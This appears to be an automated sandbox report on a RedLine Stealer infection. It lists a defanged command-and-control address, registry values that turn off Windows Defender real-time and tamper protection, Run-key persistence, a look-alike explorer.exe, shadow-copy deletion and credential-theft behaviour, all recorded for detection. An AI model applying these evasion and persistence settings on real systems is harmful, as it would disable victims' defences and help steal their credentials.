redline | hxxp://34[.]101[.]154[.]50

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

g3084756.exeAppLaunch.exeAppLaunch.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	g3084756.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	g3084756.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	g3084756.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	g3084756.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	g3084756.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	g3084756.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2000-466-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-467-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-469-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-471-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-473-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-475-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-477-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-479-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-481-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-483-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-485-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-489-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline
behavioral1/memory/2000-501-0x0000000004990000-0x00000000049CC000-memory.dmp	family_redline

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

120 4448 powershell.exe
120 4448 powershell.exe
Downloads MZ/PE file

flow	pid	process
120	4448	powershell.exe
120	4448	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

h4990012.exeoneetx.exeh0291068.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	h4990012.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	oneetx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	h0291068.exe

Executes dropped EXE 46 IoCs

Processes:

NmI5NGQx.exex1386670.exex2563617.exef8338132.exeY2Q0MzM1.exex3618941.exex4612096.exef5747904.exeg3084756.exeNGVkZTM3.exeh4990012.exeh4990012.exeh4990012.exei7478602.exeoneetx.exeoneetx.exefoto148.exex0866244.exex8891792.exef5166158.exefotocr06.exey2170022.exey5542834.exek8989832.exel9912234.exeg3279811.exeh0291068.exeZTQ3MDM2.exei3215308.exem9543478.exen6343764.exeYzlhMGI2.exeoneetx.exeoneetx.exeNGVkZTM3 (1).exeoneetx.exeY2Q0MzM1 (1).exeY2Q0MzM1 (1).exeODU0ZjFk.exeNWQ4NTA4.exeoneetx.exeYzlhMGI2 (1).exeoneetx.exeoneetx.exeY2Q0MzM1 (2).exe

pid	process
4808	NmI5NGQx.exe
3136	x1386670.exe
4444	x2563617.exe
460	f8338132.exe
4820	Y2Q0MzM1.exe
1928	x3618941.exe
2720	x4612096.exe
2608	f5747904.exe
4576	g3084756.exe
644	NGVkZTM3.exe
4240	h4990012.exe
748	h4990012.exe
2128	h4990012.exe
2000	i7478602.exe
3200	oneetx.exe
4796	oneetx.exe
2800	foto148.exe
1132	x0866244.exe
1488	x8891792.exe
2592	f5166158.exe
4120	fotocr06.exe
4180	y2170022.exe
3176	y5542834.exe
2432	k8989832.exe
3804	l9912234.exe
4604	g3279811.exe
4684	h0291068.exe
1628	ZTQ3MDM2.exe
2420	i3215308.exe
4920	m9543478.exe
1636	n6343764.exe
1628	ZTQ3MDM2.exe
920	YzlhMGI2.exe
3892	oneetx.exe
3428	oneetx.exe
3952	NGVkZTM3 (1).exe
264	oneetx.exe
2588	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
2880	ODU0ZjFk.exe
3892	NWQ4NTA4.exe
4332	oneetx.exe
3184	YzlhMGI2 (1).exe
3108	oneetx.exe
4392	oneetx.exe
3980	Y2Q0MzM1 (2).exe

Loads dropped DLL 24 IoCs

Processes:

rundll32.exeY2Q0MzM1 (1).exe

pid	process
2620	rundll32.exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 555957.crdownload	upx
behavioral1/memory/3892-1985-0x0000000000A10000-0x0000000000A3E000-memory.dmp	upx
C:\Users\Admin\Downloads\YzlhMGI2 (2).exe	upx

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

g3084756.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	g3084756.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	g3084756.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 27 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Y2Q0MzM1.exefoto148.exex8891792.exey5542834.exeNmI5NGQx.exey2170022.exefotocr06.exex2563617.exex0866244.exeYzlhMGI2.exex1386670.exex4612096.exex3618941.exeoneetx.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Y2Q0MzM1.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	foto148.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x8891792.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y5542834.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NmI5NGQx.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup8 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP009.TMP\\\""	y2170022.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP008.TMP\\\""	fotocr06.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	Y2Q0MzM1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\""	x8891792.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x2563617.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	x2563617.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	foto148.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	x0866244.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup9 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP010.TMP\\\""	y5542834.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Explorer = "C:\\Windows\\explоrer.exe"	YzlhMGI2.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	NmI5NGQx.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x1386670.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	x4612096.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	fotocr06.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y2170022.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x1386670.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x3618941.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	x3618941.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x4612096.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\foto148.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000035051\\foto148.exe"	oneetx.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fotocr06.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000036051\\fotocr06.exe"	oneetx.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x0866244.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 11 IoCs

Processes:

h4990012.exeoneetx.exek8989832.exeg3279811.exei3215308.exen6343764.exeoneetx.exeYzlhMGI2 (1).exesvchost.exeoneetx.exe

description	pid	process	target process
PID 4240 set thread context of 748	4240	h4990012.exe	h4990012.exe
PID 4240 set thread context of 2128	4240	h4990012.exe	h4990012.exe
PID 3200 set thread context of 4796	3200	oneetx.exe	oneetx.exe
PID 2432 set thread context of 1388	2432	k8989832.exe	AppLaunch.exe
PID 4604 set thread context of 3428	4604	g3279811.exe	AppLaunch.exe
PID 2420 set thread context of 836	2420	i3215308.exe	AppLaunch.exe
PID 1636 set thread context of 4356	1636	n6343764.exe	AppLaunch.exe
PID 3892 set thread context of 264	3892	oneetx.exe	oneetx.exe
PID 3184 set thread context of 4360	3184	YzlhMGI2 (1).exe	svchost.exe
PID 4360 set thread context of 4972	4360	svchost.exe	svchost.exe
PID 4332 set thread context of 4392	4332	oneetx.exe	oneetx.exe

Drops file in Windows directory 2 IoCs

Processes:

YzlhMGI2.exe

description ioc process

File created C:\Windows\explоrer.exe YzlhMGI2.exe
File opened for modification C:\Windows\explоrer.exe YzlhMGI2.exe

description	ioc	process
File created	C:\Windows\explоrer.exe	YzlhMGI2.exe
File opened for modification	C:\Windows\explоrer.exe	YzlhMGI2.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010	nsis_installer_1
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010	nsis_installer_2

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4652 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

4760 tasklist.exe

pid	process
4652	schtasks.exe

pid	process
4760	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

Processes:

WINWORD.EXEchrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1052 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3396 systeminfo.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

5004 vssadmin.exe

pid	process
1052	ipconfig.exe

pid	process
3396	systeminfo.exe

pid	process
5004	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133301094262551505"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings chrome.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4144 WINWORD.EXE
4144 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exef5747904.exeg3084756.exeAppLaunch.exechrome.exel9912234.exef5166158.exei7478602.exeAppLaunch.exeAppLaunch.exeAppLaunch.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
632	chrome.exe
632	chrome.exe
2608	f5747904.exe
2608	f5747904.exe
2608	f5747904.exe
4576	g3084756.exe
4576	g3084756.exe
4576	g3084756.exe
1388	AppLaunch.exe
1388	AppLaunch.exe
1388	AppLaunch.exe
4448	chrome.exe
4448	chrome.exe
3804	l9912234.exe
3804	l9912234.exe
3804	l9912234.exe
2592	f5166158.exe
2592	f5166158.exe
2592	f5166158.exe
2000	i7478602.exe
2000	i7478602.exe
2000	i7478602.exe
3428	AppLaunch.exe
3428	AppLaunch.exe
3428	AppLaunch.exe
4356	AppLaunch.exe
4356	AppLaunch.exe
836	AppLaunch.exe
836	AppLaunch.exe
836	AppLaunch.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe
3680	powershell.exe
3680	powershell.exe
3680	powershell.exe
3152	powershell.exe
3152	powershell.exe
3152	powershell.exe
1968	powershell.exe
1968	powershell.exe
1968	powershell.exe
1508	powershell.exe
1508	powershell.exe
1508	powershell.exe
4068	powershell.exe
4068	powershell.exe
4068	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
3272	powershell.exe
3272	powershell.exe
3272	powershell.exe
4120	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

chrome.exe

pid process

632 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

632 chrome.exe
632 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe
Token: SeShutdownPrivilege	632	chrome.exe
Token: SeCreatePagefilePrivilege	632	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe
632	chrome.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

WINWORD.EXEZTQ3MDM2.exeYzlhMGI2.exechrome.exeY2Q0MzM1 (1).exe

pid	process
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE
1628	ZTQ3MDM2.exe
920	YzlhMGI2.exe
632	chrome.exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe
4820	Y2Q0MzM1 (1).exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 632 wrote to memory of 3260	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 3260	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
PID 632 wrote to memory of 1920	632	chrome.exe	chrome.exe
